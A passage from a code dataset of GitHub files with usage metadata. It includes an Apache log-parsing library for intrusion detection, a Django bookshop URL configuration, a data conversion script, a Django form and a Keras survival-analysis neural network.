"usage_type": "name"}, {"api_name": "edubot.main_classes.LocalData", "line_number": 46, "usage_type": "name"}, {"api_name": "datatypesclass.Observer", "line_number": 62, "usage_type": "name"}, {"api_name": "datatypesclass.Subject", "line_number": 63, "usage_type": "name"}, {"api_name": "edubot.main_classes.BotData", "line_number": 63, "usage_type": "name"}, {"api_name": "edubot.main_classes.LocalData", "line_number": 63, "usage_type": "name"}, {"api_name": "datatypesclass.Observer", "line_number": 73, "usage_type": "name"}, {"api_name": "datatypesclass.Subject", "line_number": 74, "usage_type": "name"}, {"api_name": "edubot.main_classes.BotData", "line_number": 74, "usage_type": "name"}, {"api_name": "edubot.main_classes.LocalData", "line_number": 74, "usage_type": "name"}, {"api_name": "datatypesclass.Observer", "line_number": 85, "usage_type": "name"}, {"api_name": "datatypesclass.Subject", "line_number": 86, "usage_type": "name"}, {"api_name": "edubot.main_classes.BotData", "line_number": 86, "usage_type": "name"}, {"api_name": "edubot.main_classes.LocalData", "line_number": 86, "usage_type": "name"}, {"api_name": "uuid.uuid1", "line_number": 88, "usage_type": "call"}, {"api_name": "bots.models.BotAdmin.objects.filter", "line_number": 89, "usage_type": "call"}, {"api_name": "bots.models.BotAdmin.objects", "line_number": 89, "usage_type": "attribute"}, {"api_name": "bots.models.BotAdmin", "line_number": 89, "usage_type": "name"}, {"api_name": "edubot.keyboards.admin_kbrd", "line_number": 93, "usage_type": "call"}, {"api_name": "datatypesclass.Observer", "line_number": 98, "usage_type": "name"}, {"api_name": "datatypesclass.Subject", "line_number": 99, "usage_type": "name"}, {"api_name": "edubot.main_classes.BotData", "line_number": 99, "usage_type": "name"}, {"api_name": "edubot.main_classes.LocalData", "line_number": 99, "usage_type": "name"}, {"api_name": "edubot.keyboards.main_kbrd", "line_number": 106, "usage_type": "call"}]}
+{"seq_id": "70574978407", "text": "import pandas as pd\nimport re\nimport time\nimport requests\n\n\ndef dataframeLog(logfile):\n file = open(logfile, 'r')\n dataList = []\n columnList = [\"Ip\", \"Request Line\", \"Status\", \"Referer\"]\n for line in file:\n try:\n matches = None\n pattern = re.compile(\n r'([A-Za-z0-9\\.-_]+)\\s(?:-|.+)\\s(?:-|.+)\\s(?:\\[.+\\])\\s\\\"(.+)\\\"\\s(-|\\d+)\\s(?:-|\\d+)\\s\\\"(-|.*)\\\"\\s\\\"(?:-|.*)\\\"')\n matches = tuple(pattern.findall(line))[0]\n dataList.append(matches)\n except:\n print(line)\n df = pd.DataFrame(dataList, columns=columnList)\n return(df)\n\n\ndef requestSplitter(logfile, typeOfData):\n df = None\n if (typeOfData == 'CSV'):\n df = pd.read_csv(logfile)\n elif(typeOfData == 'dataframe'):\n df = logfile\n df[\"RequestType\"] = None\n df[\"RequestLink\"] = None\n pattern = re.compile(\n r'([A-Z]+|-)\\s*\\**\\s*(.*)\\s*')\n for index, row in df.iterrows():\n try:\n combinedResult = tuple(pattern.findall(row[\"Request Line\"]))[0]\n df.at[index, \"RequestType\"] = combinedResult[0]\n df.at[index, \"RequestLink\"] = combinedResult[1]\n except:\n df.at[index, \"RequestType\"] = \"Unk\"\n df.at[index, \"RequestLink\"] = row[\"Request Line\"]\n\n df = df[['Ip', 'RequestType', 'RequestLink', 'Status',\n 'Referer']]\n return(df)\n\n\ndef requestLineFileSplit(df):\n df[\"RequestFileType\"] = \"\"\n pattern = re.compile(\n r'\\.(\\w{2,3}|(?:[/?{}]+(\\/)\\s))')\n for index, row in df.iterrows():\n try:\n combinedResult = tuple(pattern.findall(row[\"RequestLink\"]))[0]\n df.at[index, \"RequestFileType\"] = combinedResult[0]\n except:\n df.at[index, \"RequestFileType\"] = \"Unk\"\n\n df = df[['Ip', 'RequestType', 'RequestFileType', 'Status',\n 'Referer']]\n return(df)\n\n\ndef refererPreprocess(df):\n df[\"RefererGeneral\"] = \"\"\n pattern = re.compile(\n r'(\\w*\\.\\w*)')\n for index, row in df.iterrows():\n try:\n combinedResult = tuple(pattern.findall(row[\"Referer\"]))[0]\n df.at[index, \"RefererGeneral\"] = combinedResult\n except:\n df.at[index, \"RefererGeneral\"] = \"Unk\"\n\n df = df[['Ip', 'RequestType', 'RequestFileType', 'Status',\n 'RefererGeneral']]\n return(df)\n\n\ndef returnCountryCode(apiKey, ipAddr):\n try:\n data = requests.get(\n \"http://api.ipinfodb.com/v3/ip-country/?key=\"+apiKey+\"&ip=\"+ipAddr+\"&format=json\").json()\n if (data['statusCode'] == \"OK\"):\n return(data['countryCode'])\n else:\n return(\"None\")\n except:\n return(\"None\")\n\n\ndef reverseIpLookup(df, key):\n ipDict = {}\n df[\"Country\"] = ''\n for index, row in df.iterrows():\n if row[\"Ip\"] in ipDict:\n row[\"Country\"] = ipDict[row[\"Ip\"]]\n else:\n print(str(row[\"Ip\"]))\n time.sleep(0.65) # Comment if Paid key is given\n countryCode = returnCountryCode(\n key, row[\"Ip\"])\n ipDict[row[\"Ip\"]] = countryCode\n row[\"Country\"] = countryCode\n return(df)\n\n\ndef accessLogInit(logfile):\n dataFrame = dataframeLog(logfile)\n dataFrame = requestSplitter(dataFrame, 'dataframe')\n dataFrame = requestLineFileSplit(dataFrame)\n dataFrame = refererPreprocess(dataFrame)\n dataFrame = dataFrame.replace(r'\\s+', '-', regex=True).replace('', '-')\n return(dataFrame)\n", "repo_name": "DarrenR96/AI-Apache-Server-Intrusion-Detection-and-Avoidance", "sub_path": "pythonApacheLibrary/apacheLogs.py", "file_name": "apacheLogs.py", "file_ext": "py", "file_size_in_byte": 3477, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "re.compile", "line_number": 14, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 20, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 27, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 32, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 50, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 66, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 82, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 100, "usage_type": "call"}]}
+{"seq_id": "39669003564", "text": "\"\"\"bookShop URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom myapp.views import views\nfrom myapp.views import users\nfrom myapp.views import cars\nfrom myapp.views import books\nfrom myapp.views import addr\nfrom myapp.views import orders\nfrom myapp.views import comments\nfrom myapp.views import collections\nfrom myapp.views import grades\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('',views.index),\n path('getcode/',users.getCode),\n path('selectBook/',views.selectBook),\n path('showBook/',views.showBook),\n path('selectBookItem/',views.showBookItem),\n path('login/', users.login),\n path('logout/', users.logout),\n path('register/', users.register),\n path('showUser/',users.showUser),\n path('updateUser/',users.updateUser),\n path('updatePwd/',users.updatePwd),\n path('showSeller/',users.showSeller),\n path('addCar/',books.book),#标记\n path('delCar/',cars.delCar),\n path('buyCarBook/',cars.buyCarBook),\n path('selectCar/',cars.selectCar),\n path('updateCar/',cars.updateCar),\n path('book/',books.book),\n path('addBook/',books.addBook),\n path('sellerSelectBook/',books.sellerSelectBook),\n path('buyBook/',books.buyBook),\n path('delBook/',books.delBook),\n path('updateBook/',books.updateBook),\n path('addAddr/',addr.addAddr),\n path('selectAddr/',addr.selectAddr),\n path('delAddr/',addr.delAdddr),\n path('updateAddr/',addr.updateAddr),\n path('addClt/',collections.addCollection),\n path('selectClt/',collections.selectCollection),\n path('delClt/',collections.delCollection),\n path('addOrder/',orders.addOrder),\n path('addCarOrder/',orders.addCarOrder),\n path('payOrder/',orders.payOrder),\n path('notPayOrder/',orders.notPayOrder),\n path('selectOrder/',orders.selectOrder),\n path('updateOrder/',orders.updateOrder),\n path('delOrder/',orders.delOrder),\n path('addComment/',comments.addComment),\n path('updateComment/',comments.updateComment),\n path('delComment/',comments.delComment),\n path('bookSelectComment/',comments.bookSelectComment),\n path('userSelectComment/',comments.userSelectComment),\n path('addGrade/',grades.addGrade),\n path(\"updateOrderStatus/\",orders.updateOrderStatus),\n path(\"showDetails/\",orders.showDetails),\n path(\"chat/\",users.chat),\n path(\"shoppay/\",views.shoppay),\n] + static(settings.MEDIA_URL,document_root=settings.MEDIA_ROOT)", "repo_name": "HouYingping/bookShop", "sub_path": "bookShop/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 3114, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.urls.path", "line_number": 31, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 31, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 31, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 32, "usage_type": "call"}, {"api_name": "myapp.views.views.index", "line_number": 32, "usage_type": "attribute"}, {"api_name": "myapp.views.views", "line_number": 32, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 33, "usage_type": "call"}, {"api_name": "myapp.views.users.getCode", "line_number": 33, "usage_type": "attribute"}, {"api_name": "myapp.views.users", "line_number": 33, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 34, "usage_type": "call"}, {"api_name": "myapp.views.views.selectBook", "line_number": 34, "usage_type": "attribute"}, {"api_name": "myapp.views.views", "line_number": 34, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 35, "usage_type": "call"}, {"api_name": "myapp.views.views.showBook", "line_number": 35, "usage_type": "attribute"}, {"api_name": "myapp.views.views", "line_number": 35, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 36, "usage_type": "call"}, {"api_name": "myapp.views.views.showBookItem", "line_number": 36, "usage_type": "attribute"}, {"api_name": "myapp.views.views", "line_number": 36, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 37, "usage_type": "call"}, {"api_name": "myapp.views.users.login", "line_number": 37, "usage_type": "attribute"}, {"api_name": "myapp.views.users", "line_number": 37, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 38, "usage_type": "call"}, {"api_name": "myapp.views.users.logout", "line_number": 38, "usage_type": "attribute"}, {"api_name": "myapp.views.users", "line_number": 38, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 39, "usage_type": "call"}, {"api_name": "myapp.views.users.register", "line_number": 39, "usage_type": "attribute"}, {"api_name": "myapp.views.users", "line_number": 39, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 40, "usage_type": "call"}, {"api_name": "myapp.views.users.showUser", "line_number": 40, "usage_type": "attribute"}, {"api_name": "myapp.views.users", "line_number": 40, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 41, "usage_type": "call"}, {"api_name": "myapp.views.users.updateUser", "line_number": 41, "usage_type": "attribute"}, {"api_name": "myapp.views.users", "line_number": 41, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 42, "usage_type": "call"}, {"api_name": "myapp.views.users.updatePwd", "line_number": 42, "usage_type": "attribute"}, {"api_name": "myapp.views.users", "line_number": 42, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 43, "usage_type": "call"}, {"api_name": "myapp.views.users.showSeller", "line_number": 43, "usage_type": "attribute"}, {"api_name": "myapp.views.users", "line_number": 43, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 44, "usage_type": "call"}, {"api_name": "myapp.views.books.book", "line_number": 44, "usage_type": "attribute"}, {"api_name": "myapp.views.books", "line_number": 44, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 45, "usage_type": "call"}, {"api_name": "myapp.views.cars.delCar", "line_number": 45, "usage_type": "attribute"}, {"api_name": "myapp.views.cars", "line_number": 45, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 46, "usage_type": "call"}, {"api_name": "myapp.views.cars.buyCarBook", "line_number": 46, "usage_type": "attribute"}, {"api_name": "myapp.views.cars", "line_number": 46, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 47, "usage_type": "call"}, {"api_name": "myapp.views.cars.selectCar", "line_number": 47, "usage_type": "attribute"}, {"api_name": "myapp.views.cars", "line_number": 47, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 48, "usage_type": "call"}, {"api_name": "myapp.views.cars.updateCar", "line_number": 48, "usage_type": "attribute"}, {"api_name": "myapp.views.cars", "line_number": 48, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 49, "usage_type": "call"}, {"api_name": "myapp.views.books.book", "line_number": 49, "usage_type": "attribute"}, {"api_name": "myapp.views.books", "line_number": 49, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 50, "usage_type": "call"}, {"api_name": "myapp.views.books.addBook", "line_number": 50, "usage_type": "attribute"}, {"api_name": "myapp.views.books", "line_number": 50, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 51, "usage_type": "call"}, {"api_name": "myapp.views.books.sellerSelectBook", "line_number": 51, "usage_type": "attribute"}, {"api_name": "myapp.views.books", "line_number": 51, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 52, "usage_type": "call"}, {"api_name": "myapp.views.books.buyBook", "line_number": 52, "usage_type": "attribute"}, {"api_name": "myapp.views.books", "line_number": 52, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 53, "usage_type": "call"}, {"api_name": "myapp.views.books.delBook", "line_number": 53, "usage_type": "attribute"}, {"api_name": "myapp.views.books", "line_number": 53, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 54, "usage_type": "call"}, {"api_name": "myapp.views.books.updateBook", "line_number": 54, "usage_type": "attribute"}, {"api_name": "myapp.views.books", "line_number": 54, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 55, "usage_type": "call"}, {"api_name": "myapp.views.addr.addAddr", "line_number": 55, "usage_type": "attribute"}, {"api_name": "myapp.views.addr", "line_number": 55, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 56, "usage_type": "call"}, {"api_name": "myapp.views.addr.selectAddr", "line_number": 56, "usage_type": "attribute"}, {"api_name": "myapp.views.addr", "line_number": 56, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 57, "usage_type": "call"}, {"api_name": "myapp.views.addr.delAdddr", "line_number": 57, "usage_type": "attribute"}, {"api_name": "myapp.views.addr", "line_number": 57, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 58, "usage_type": "call"}, {"api_name": "myapp.views.addr.updateAddr", "line_number": 58, "usage_type": "attribute"}, {"api_name": "myapp.views.addr", "line_number": 58, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 59, "usage_type": "call"}, {"api_name": "myapp.views.collections.addCollection", "line_number": 59, "usage_type": "attribute"}, {"api_name": "myapp.views.collections", "line_number": 59, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 60, "usage_type": "call"}, {"api_name": "myapp.views.collections.selectCollection", "line_number": 60, "usage_type": "attribute"}, {"api_name": "myapp.views.collections", "line_number": 60, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 61, "usage_type": "call"}, {"api_name": "myapp.views.collections.delCollection", "line_number": 61, "usage_type": "attribute"}, {"api_name": "myapp.views.collections", "line_number": 61, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 62, "usage_type": "call"}, {"api_name": "myapp.views.orders.addOrder", "line_number": 62, "usage_type": "attribute"}, {"api_name": "myapp.views.orders", "line_number": 62, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 63, "usage_type": "call"}, {"api_name": "myapp.views.orders.addCarOrder", "line_number": 63, "usage_type": "attribute"}, {"api_name": "myapp.views.orders", "line_number": 63, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 64, "usage_type": "call"}, {"api_name": "myapp.views.orders.payOrder", "line_number": 64, "usage_type": "attribute"}, {"api_name": "myapp.views.orders", "line_number": 64, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 65, "usage_type": "call"}, {"api_name": "myapp.views.orders.notPayOrder", "line_number": 65, "usage_type": "attribute"}, {"api_name": "myapp.views.orders", "line_number": 65, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 66, "usage_type": "call"}, {"api_name": "myapp.views.orders.selectOrder", "line_number": 66, "usage_type": "attribute"}, {"api_name": "myapp.views.orders", "line_number": 66, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 67, "usage_type": "call"}, {"api_name": "myapp.views.orders.updateOrder", "line_number": 67, "usage_type": "attribute"}, {"api_name": "myapp.views.orders", "line_number": 67, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 68, "usage_type": "call"}, {"api_name": "myapp.views.orders.delOrder", "line_number": 68, "usage_type": "attribute"}, {"api_name": "myapp.views.orders", "line_number": 68, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 69, "usage_type": "call"}, {"api_name": "myapp.views.comments.addComment", "line_number": 69, "usage_type": "attribute"}, {"api_name": "myapp.views.comments", "line_number": 69, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 70, "usage_type": "call"}, {"api_name": "myapp.views.comments.updateComment", "line_number": 70, "usage_type": "attribute"}, {"api_name": "myapp.views.comments", "line_number": 70, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 71, "usage_type": "call"}, {"api_name": "myapp.views.comments.delComment", "line_number": 71, "usage_type": "attribute"}, {"api_name": "myapp.views.comments", "line_number": 71, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 72, "usage_type": "call"}, {"api_name": "myapp.views.comments.bookSelectComment", "line_number": 72, "usage_type": "attribute"}, {"api_name": "myapp.views.comments", "line_number": 72, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 73, "usage_type": "call"}, {"api_name": "myapp.views.comments.userSelectComment", "line_number": 73, "usage_type": "attribute"}, {"api_name": "myapp.views.comments", "line_number": 73, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 74, "usage_type": "call"}, {"api_name": "myapp.views.grades.addGrade", "line_number": 74, "usage_type": "attribute"}, {"api_name": "myapp.views.grades", "line_number": 74, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 75, "usage_type": "call"}, {"api_name": "myapp.views.orders.updateOrderStatus", "line_number": 75, "usage_type": "attribute"}, {"api_name": "myapp.views.orders", "line_number": 75, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 76, "usage_type": "call"}, {"api_name": "myapp.views.orders.showDetails", "line_number": 76, "usage_type": "attribute"}, {"api_name": "myapp.views.orders", "line_number": 76, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 77, "usage_type": "call"}, {"api_name": "myapp.views.users.chat", "line_number": 77, "usage_type": "attribute"}, {"api_name": "myapp.views.users", "line_number": 77, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 78, "usage_type": "call"}, {"api_name": "myapp.views.views.shoppay", "line_number": 78, "usage_type": "attribute"}, {"api_name": "myapp.views.views", "line_number": 78, "usage_type": "name"}, {"api_name": "django.conf.urls.static.static", "line_number": 79, "usage_type": "call"}, {"api_name": "django.conf.settings.MEDIA_URL", "line_number": 79, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 79, "usage_type": "name"}, {"api_name": "django.conf.settings.MEDIA_ROOT", "line_number": 79, "usage_type": "attribute"}]}
+{"seq_id": "30473219782", "text": "# encoding:utf-8\n'''\n@Author: catnlp\n@Email: wk_nlp@163.com\n@Time: 2018/5/24 15:48\n'''\nimport os\nimport json\nimport openpyxl\n\nclass Origin2Raw:\n def __init__(self, path, save):\n if os.path.exists(path):\n if path[-1] != '/':\n path += '/'\n self.path = path\n else:\n print('Folder does not exists!')\n exit(1)\n\n if not os.path.exists(save):\n os.makedirs(save)\n if save[-1] != '/':\n save += '/'\n self.save = save\n\n print('Origin path: %s', self.path)\n print('Raw path: %s', self.save)\n\n def excel2dict(self, dict_name, save_name='dict.txt', sheet_name=None):\n dict_path = self.path + dict_name\n print('Excel path: %s', dict_path)\n if not os.path.exists(dict_path):\n print('Excel does not exists!')\n exit(1)\n save_path = self.save + save_name\n\n work_book = openpyxl.load_workbook(dict_path)\n if sheet_name:\n sheet = work_book.get_sheet_by_name(sheet_name)\n else:\n sheet_names = work_book.get_sheet_names()\n sheet = work_book.get_sheet_by_name(sheet_names[0])\n\n with open(save_path, 'w') as dict:\n for row in range(1, sheet.max_row):\n dict.write(sheet.cell(row+1, 2).value + '\\t' + sheet.cell(row+1, 3).value + '\\n')\n print(sheet.cell(row+1, 2).value + '\\t' + sheet.cell(row+1, 3).value)\n\n def json2text(self, save_name='raw.txt', json_suffix='jsonl'):\n save_path = self.save + save_name\n with open(save_path, 'w') as raw:\n for parent, dirnames, filenames in os.walk(self.path):\n for filename in filenames:\n if filename.endswith(json_suffix) and filename.find('17') == -1:\n file_path = os.path.join(parent, filename)\n print('文件名:%s' % filename)\n print('文件完整路径:%s\\n' % file_path)\n with open(file_path) as origin:\n lines = origin.readlines()\n for line in lines:\n dict = json.loads(line)\n if dict['answer'] == 'accept':\n raw.write(dict['text'] + '\\n')\n\nif __name__ == '__main__':\n origin2raw = Origin2Raw('../data/origin/Anti-fraud Product Data', '../data/raw')\n origin2raw.excel2dict('Entity Dictionary.xlsx')\n origin2raw.json2text()", "repo_name": "catnlp/DomainNER", "sub_path": "utils/origin2raw.py", "file_name": "origin2raw.py", "file_ext": "py", "file_size_in_byte": 2547, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.exists", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path", "line_number": 33, "usage_type": "attribute"}, {"api_name": "openpyxl.load_workbook", "line_number": 38, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 62, "usage_type": "call"}]}
+{"seq_id": "37072656022", "text": "from django import forms\nfrom .widgets import CustomClearableFileInput\nfrom .models import Product, Category, Brand\n\n\nclass ProductForm(forms.ModelForm):\n\n class Meta:\n model = Product\n fields = '__all__'\n\n image = forms.ImageField(label='Image', required=False,\n widget=CustomClearableFileInput)\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n categories = Category.objects.all()\n brands = Brand.objects.all()\n friendly_names = [(c.id, c.get_friendly_name()) for c in categories]\n friendly_names_brand = [(b.id, b.get_friendly_name()) for b in brands]\n\n self.fields['category'].choices = friendly_names\n for field_name, field in self.fields.items():\n field.widget.attrs['class'] = ''\n\n self.fields['brand'].choices = friendly_names_brand\n for field_name, field in self.fields.items():\n field.widget.attrs['class'] = ''\n", "repo_name": "Mathias-SantAnna/lotr-collectibles", "sub_path": "products/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 983, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.forms.ModelForm", "line_number": 6, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 6, "usage_type": "name"}, {"api_name": "models.Product", "line_number": 9, "usage_type": "name"}, {"api_name": "django.forms.ImageField", "line_number": 12, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 12, "usage_type": "name"}, {"api_name": "widgets.CustomClearableFileInput", "line_number": 13, "usage_type": "name"}, {"api_name": "models.Category.objects.all", "line_number": 17, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 17, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 17, "usage_type": "name"}, {"api_name": "models.Brand.objects.all", "line_number": 18, "usage_type": "call"}, {"api_name": "models.Brand.objects", "line_number": 18, "usage_type": "attribute"}, {"api_name": "models.Brand", "line_number": 18, "usage_type": "name"}]}
+{"seq_id": "74515240807", "text": "from models.base import BaseModel\nimport numpy as np\nimport operator\nfrom keras import backend as K\nfrom keras.models import Model, Sequential\nfrom keras.layers import Input, Dense, concatenate, Dropout, Activation\nfrom keras import optimizers, applications, callbacks\nfrom keras.callbacks import ModelCheckpoint, ReduceLROnPlateau\nfrom lifelines.utils import concordance_index\nfrom keras.callbacks import LearningRateScheduler\nfrom abc import ABCMeta, abstractmethod\nfrom sklearn.metrics import roc_auc_score\nimport pandas as pd\n\n__author__ = 'Bonggun Shin','Sungsoo Park'\n\nclass MyCallback(ModelCheckpoint):\n def __init__(self, filepath, data, real_save=True, patience=20):\n super(MyCallback, self).__init__(filepath, save_weights_only=True)\n self.patience = patience\n\n self.x_trn, self.c_trn, self.s_trn, self.x_dev, self.c_dev, self.s_dev = data\n\n self.cindex_dev = 0\n self.cindex_best_epoch = 0\n self.real_save = real_save\n self.filepath_template = self.filepath+'-%s'\n self.max_epoch = 100\n\n def print_status(self):\n print('\\n=========================== [Best cindex (epoch = %d)] cindex=%f =================================='\n % (self.cindex_best_epoch, self.cindex_dev))\n\n\n def on_train_end(self, logs=None):\n print('[Best:on_train_end]')\n self.print_status()\n\n def on_epoch_end(self, epoch, logs=None):\n pred_dev = -np.exp(self.model.predict(self.x_dev, batch_size=1, verbose=0))\n cindex_dev = concordance_index(self.s_dev, pred_dev, self.c_dev)\n\n if self.cindex_dev < cindex_dev:\n self.cindex_dev = cindex_dev\n self.cindex_best_epoch = epoch\n if self.real_save is True:\n if self.save_weights_only:\n self.model.save_weights(self.filepath, overwrite=True)\n else:\n self.model.save(self.filepath, overwrite=True)\n\n else:\n if epoch - self.cindex_best_epoch > self.patience:\n self.model.stop_training = True\n print(\"Early stopping at %d\" % epoch)\n\n if epoch > self.max_epoch:\n self.model.stop_training = True\n print(\"Stopping at max epoch %d\" % epoch)\n\nclass SurvivalNeuralNet(BaseModel):\n def __init__(self, model_name, cancer, omics_type, out_folder, epochs=100):\n super(SurvivalNeuralNet, self).__init__(model_name, cancer, omics_type, out_folder)\n self.epochs = epochs\n self.model_name = model_name\n self.cancer = cancer\n self.omics_type = omics_type\n self.out_folder = out_folder\n\n @abstractmethod\n def get_model(self, input_size, dropout):\n pass\n\n def reset_weights(self):\n session = K.get_session()\n for layer in self.model.layers:\n if hasattr(layer, 'kernel_initializer'):\n layer.kernel.initializer.run(session=session)\n\n @abstractmethod\n def preprocess(self, x, n_feature):\n pass\n\n def feature_selection(self, x, c, s, names, fold, sel_num):\n pass\n\n def train(self, x, c, s, names, fold, n_feature=50):\n #learning_ratio = 1e-3\n n = x.shape[0]\n dev_index = n * 3 // 4\n\n x = self.preprocess(x, c, s, names, fold, n_feature, dev_index)\n x_trn, x_dev = x[:dev_index], x[dev_index:]\n c_trn, c_dev = 1 - c[:dev_index], 1 - c[dev_index:]\n s_trn, s_dev = s[:dev_index], s[dev_index:]\n\n sort_idx = np.argsort(s_trn)[::-1]\n x_trn = x_trn[sort_idx]\n s_trn = s_trn[sort_idx]\n c_trn = c_trn[sort_idx]\n\n def nll(E, NUM_E):\n def loss(y_true, y_pred):\n hazard_ratio = K.exp(y_pred)\n log_risk = K.log(K.cumsum(hazard_ratio))\n uncensored_likelihood = K.transpose(y_pred) - log_risk\n censored_likelihood = uncensored_likelihood * E\n neg_likelihood = -K.sum(censored_likelihood) / NUM_E\n return neg_likelihood\n\n return loss\n\n input_size = len(x[0])\n\n cindex_dev = {}\n # for dropout in [0.0, 0.5]:\n for dropout in [0.0]:\n self.model = self.get_model(input_size, dropout)\n for lr in [0.1, 0.01, 0.001, 0.0001]:\n print('############## Run at ', fold, dropout, lr) \n adam = optimizers.Adam(lr=lr)\n self.model.compile(loss=[nll(c_trn, np.sum(c_trn))], optimizer=adam)\n\n data = (x_trn, c_trn, s_trn, x_dev, c_dev, s_dev)\n modelpath = self.out_folder+'/%s/%s_(%d)_%0.1f_%0.5f.hdf5' % (self.model_name, self.cancer, fold, dropout, lr)\n\n checkpoint = MyCallback(modelpath, data)\n\n self.model.fit(x_trn, s_trn, epochs=self.epochs, batch_size=len(x_trn),\n verbose=0, shuffle=False, callbacks=[checkpoint])\n self.model.load_weights(modelpath)\n pred_raw = self.model.predict(x_dev, batch_size=1, verbose=1)\n pred_dev = -np.exp(pred_raw)\n cindex_dev_max = concordance_index(s_dev, pred_dev, c_dev)\n\n cindex_dev[modelpath] = cindex_dev_max\n\n self.reset_weights()\n\n self.bestmodelpath, self.cindex_dev_max = max(cindex_dev.items(), key=operator.itemgetter(1))\n\n return self.cindex_dev_max\n\n def evaluate(self, x, c, s, fold, n_feature=50, do_gse_eval=False):\n x = self.preprocess_eval(x)\n self.model.load_weights(self.bestmodelpath)\n pred_raw = self.model.predict(x, batch_size=1, verbose=1)\n pred_tst = -np.exp(pred_raw)\n self.cindex_tst_max = concordance_index(s, pred_tst, 1-c)\n\n K.clear_session()\n\n return self.cindex_tst_max", "repo_name": "deargen/DearCascadedWx", "sub_path": "src/models/neuralnet.py", "file_name": "neuralnet.py", "file_ext": "py", "file_size_in_byte": 5791, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 